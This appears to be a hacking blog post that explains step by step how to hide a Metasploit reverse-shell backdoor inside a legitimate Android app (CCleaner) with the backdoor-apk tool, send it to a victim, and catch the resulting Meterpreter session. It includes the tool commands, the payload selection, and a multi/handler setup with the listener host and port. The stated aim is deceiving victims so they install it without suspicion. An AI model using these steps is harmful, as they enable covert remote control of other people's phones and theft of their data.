Sometimes in hacking we have
to use most genuine way so that victim is surely hacked. These genuine ways are
to be used for our advantage. One of the most genuine ways to hack an android
phone is to bind original android file to your backdoor-apk. This backdoor-apk
is software which helps us to bind original apk file with your virus. Hence,
taking all the suspicious away from you.
And for this first you have
to execute the following command:
apt-get install lib32stdc++6
lib32ncurses5 lib32z1
Once the command is
execution and installation is done then downloads the backdoor-apk from github
and for that type:
As the software is
downloaded, go to the www.apk4fun.com
website and download an original apk file like I downloaded ccleaner.
And then copy it in the backdoor-apk folder.
Open it in the
terminal and type:
./backdoor-apk.sh
ccleaner.apk
As the command runs
it will ask you for the payload you want to use and for that select 3 and then
it will ask you for lhost and lport and give these respectively.
The above commands
will bind the file to the original apk file and will save it to backdoor-apk>original>dist
folder.
Now all you have to
do is send the file to the victim as he will install it by clicking on next.
And the click on
Install to install the app.
This way the app
will be downloaded.
Before opening the
app,open metasploit and type :
use exploit/multi/handler
set payload
android/meterpreter/reverse_tcp
set lhost
192.168.1.126
set lport 4444
exploit
After this when you
run the app; you will get meterpreter session.
0 comments:
Post a Comment